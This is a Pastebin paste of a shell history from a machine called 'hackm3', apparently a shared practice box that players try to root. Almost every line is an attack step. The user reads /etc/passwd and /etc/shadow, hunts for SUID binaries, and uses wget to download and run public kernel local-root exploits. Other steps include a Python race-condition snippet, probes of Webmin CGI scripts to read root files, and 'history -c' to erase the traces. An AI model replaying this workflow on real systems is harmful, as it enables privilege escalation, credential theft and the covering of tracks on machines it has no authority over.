Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [n00b@hackm3 html]$ history
- 1 pwd
- 2 cd /var/www
- 3 ls
- 4 cd html
- 5 vi index.html
- 6 ls
- 7 cat info.php
- 8 ls -l
- 9 sudo
- 10 su
- 11 cd /home/n00b/
- 12 ls
- 13 cd ../
- 14 ls
- 15 cd /etc
- 16 cat passwd
- 17 cd /var/www/html
- 18 chown index.html
- 19 chown index.html n00b
- 20 chown n00b index.html
- 21 sudo chown noob index.html
- 22 cd webalizer/
- 23 ;s
- 24 ls
- 25 cat index.html
- 26 who
- 27 uname -a
- 28 ps aux
- 29 uname -a
- 30 cat .bash_history
- 31 uname -a
- 32 nano
- 33 ls
- 34 ls -la
- 35 cd ..
- 36 ls -la
- 37 cd ..
- 38 ls -la
- 39 cd tmp
- 40 ls
- 41 cd gconfd-root/
- 42 ls
- 43 ls -la
- 44 cd ..
- 45 cd ~/
- 46 ls
- 47 nano temp.c
- 48 mv temp.c temp.py
- 49 python temp.py
- 50 rm temp.py
- 51 nano temp.c
- 52 gcc temp.c -O temp
- 53 gcc temp.c -o temp
- 54 nano temp.c
- 55 rm temp.c
- 56 nano temp.c
- 57 gcc temp.c
- 58 nano temp.c
- 59 gcc temp.c -o temp
- 60 nano temp.c
- 61 gcc temp.c -o temp
- 62 nano temp.c
- 63 gcc temp.c -o temp
- 64 nano temp.c
- 65 nano temp.c
- 66 rm temp.c
- 67 who
- 68 uname 0a
- 69 uname -a
- 70
- 71 import os
- 72 import time
- 73 import random
- 74 while (i == 0):
- 75 os.system("sleep 1")
- 76 while (x == 0):
- 77 time.sleep(random.random()) #random int 0.0-1.0
- 78 pid = str(os.system("ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }"))
- 79 if (pid == 0): #need an active pid, race condition applies
- 80 print "[+] Didnt grab PID, got: " + pid + " -- Retrying..."
- 81 return
- 82 else:
- 83 print "[+] PID: " + pid
- 84 loc = "echo n > /proc/" + pid + "/fd/1"
- 85 os.system(loc) # triggers the fault, runs via sh
- 86 uname -a
- 87 wget http://grsecurity.net/~spender/therebel.tgz
- 88 tar zxvf therebel.tgz
- 89 cd therebel
- 90 ls
- 91 nano therebel.sh
- 92 ./therebel.sh
- 93 gcc exploit.c -o exploit
- 94 gcc pwnkernel.c -o pwnkernel
- 95 ls
- 96 ./pwnkernel
- 97 ./exploit
- 98 cd ..
- 99 rm -rf therebel
- 100 nano temp.c
- 101 gcc temp.c -o temp
- 102 ls
- 103 ./temp
- 104 rm *
- 105 ls
- 106 wget http://www.exploit-db.com/sploits/2009-linux-sendpage2.tar.gz
- 107 tar zxvf 2009-linux-sendpage2.tar.gz
- 108 cd linux-sendpage2/
- 109 ls
- 110 ./run
- 111 cd ..
- 112 rm -rf *
- 113 ls
- 114 wget http://exploit-db.com/sploits/2009-linux-sendpage3.tar.gz
- 115 tar zxvf 2009-linux-sendpage3.tar.gz
- 116 cd linux-sendpage3/
- 117 ls
- 118 gcc exploit.c -o exploit
- 119 ;s
- 120 ls
- 121 ./exploit
- 122 cd ..
- 123 rm -rf *
- 124 uname -a
- 125 nano test.c
- 126 gcc test.c -o test
- 127 ./test
- 128 rm *
- 129 nano test.c
- 130 gcc test.c -o test
- 131 ./test
- 132 for i in `find / -perm +6000 -type f`; do ls -aFl $i >> suids; done
- 133 ls
- 134 cat suids
- 135 'find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \
- 136 ;
- 137 \
- 138 ";
- 139 'find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \;
- 140 /usr/libexec/utempter/utempter --help
- 141 /usr/libexec/utempter/utempter -v
- 142 /usr/libexec/utempter/utempter --v
- 143 nano test.sh
- 144 ./test.sh
- 145 chmod +x test.sh
- 146 ./test.sh
- 147 /usr/bin/gpasswd
- 148 /usr/bin/gpasswd --help
- 149 /usr/bin/gpasswd root
- 150 /usr/bin/gpasswd n00b
- 151 /usr/bin/gpasswd
- 152 nano .bash_his
- 153 ls -la
- 154 who
- 155 locate exp.c
- 156 updatedb
- 157 gpasswd
- 158 gpasswd -f root
- 159 telnet localhost 21
- 160 ftp localhost
- 161 who
- 162 ls
- 163 cat suids
- 164 uname -a
- 165 who
- 166 ls
- 167 wget http://www.grsecurity.net/~spender/enlightenment.tgz
- 168 tar zxvf enlightenment.tgz
- 169 cd enlightenment
- 170 ./run_null_exploits.sh
- 171 ./run_nonnull_exploits.sh
- 172 ./run_nonnull_exploits.sh
- 173 cd ..
- 174 ls
- 175 rm -rf *
- 176 ls
- 177 ls -la
- 178 who
- 179 ls
- 180 ls -la
- 181 ls -la
- 182 ps aux
- 183 ls
- 184 woah dude, this is lame, i just watched the video now hoping for a hint on this part, didnt know it showed how to gain ssh access :/
- 185 wall :P
- 186 ls
- 187 ls -la
- 188 for i in `find / -perm +6000 -type f`; do ls -aFl $i >> suids; done
- 189 ls -la
- 190 cat suids
- 191 ls
- 192 ls
- [quote] 193 who
- 194 cd /tmp
- 195 ls
- 196 cd gconfd-root/
- 197 ls
- 198 ls -la gconfd-root/
- 199 wall hey man, been trying to root this box for ages ><
- 200 wall hey man, been trying to root this box for ages
- 201 wall ahh thanks bud
- 202 who
- 203 wall might i ask whom you are ?
- 204 who
- 205 cd /root
- 206 ls
- 207 cd /
- 208 ls
- 209 cd media
- 210 ls
- 211 cd /var/www/html
- 212 ls
- 213 vi index.html
- 214 ls -l
- 215 cd /var/www/usage
- 216 ls
- 217 cd /etc
- 218 ls
- 219 cd webmin
- 220 ls
- 221 cd useradmin/
- 222 ls
- 223 cd ../
- 224 ls -l
- 225 cat config
- 226 cat /etc/shadow
- 227 reboot
- 228 cd /etc
- 229 ls
- 230 cat redhat-release
- 231 cd webmin/
- 232 ls
- 233 cd ~
- 234 ls
- 235 vi
- 236 vi
- 237 vi
- 238 ls
- 239 chmod a+x *
- 240 ./wunderbar_emporium.sh
- 241 vi
- 242 ./wunderbar_emporium.sh
- 243 rm -f *
- 244 ls
- 245 vi
- 246 ./exploit.c
- 247 chmod a+x exploit.c
- 248 ./exploit.c
- 249 wget http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
- 250 gcc 27704.c -o exploit
- 251 ./exploit
- 252 ls
- 253 rm *
- 254 ls
- 255 vi
- 256 gcc -fno-stack-protector -o exploit exploit.c
- 257 ./exploit
- 258 cc -fno-stack-protector -o exploit exploit.c
- 259 ./exploit
- 260 rm *
- 261 ls
- 262 uname -r
- 263 wget http://downloads.securityfocus.com/vulnerabilities/exploits/27801-2.c
- 264 gcc 27801-2.c
- 265 gcc -o exp 27801-2.c
- 266 vi 27801-2.c
- 267 gcc -o exp 27801-2.c
- 268 ./exp
- 269 rm *
- 270 locate cgi
- 271 ls
- 272 locate cgi > lol
- 273 nano lol
- 274 /usr/local/share/webmin-1.280/rpc.cgi
- 275 nano lol
- 276 /usr/local/share/webmin-1.280/file/list.cgi
- 277 /usr/local/share/webmin-1.280/file/list.cgi /root
- 278 /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf
- 279 nano lol
- 280 locate miniserv
- 281 /usr/bin/perl /usr/local/share/webmin-1.280/miniserv.pl /etc/webmin/miniserv.conf
- 282 /usr/bin/perl /usr/local/share/webmin-1.280/miniserv.pl /etc/webmin/miniserv.conf
- 283 nano lol
- 284 /usr/local/share/webmin-1.280/file/root.cgi
- 285 /usr/local/share/webmin-1.280/file/root.cgicd /usr/local/share/webmin-1.280/
- 286 cd /usr/local/share/webmin-1.280/
- 287 ls
- 288 cd file
- 289 ls -lar
- 290 ./list.cgi
- 291 ./list.cgi /root
- 292 nano list.cgi
- 293 locate defaultacl.cgi
- 294 locate defaultac
- 295 perl /usr/local/share/webmin-1.280/defaultacl
- 296 perl /usr/local/share/webmin-1.280/defaultacl 9 /etc/passwd
- 297 perl /usr/local/share/webmin-1.280/defaultacl
- 298 locate defaultacl.cgi
- 299 locate defaultac
- 300 ls
- 301 cd ..
- 302 ls
- 303 cd ..[/quote]
- 304 ls
- 305 cd ..
- [n00b@hackm3 html]$ history -c
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement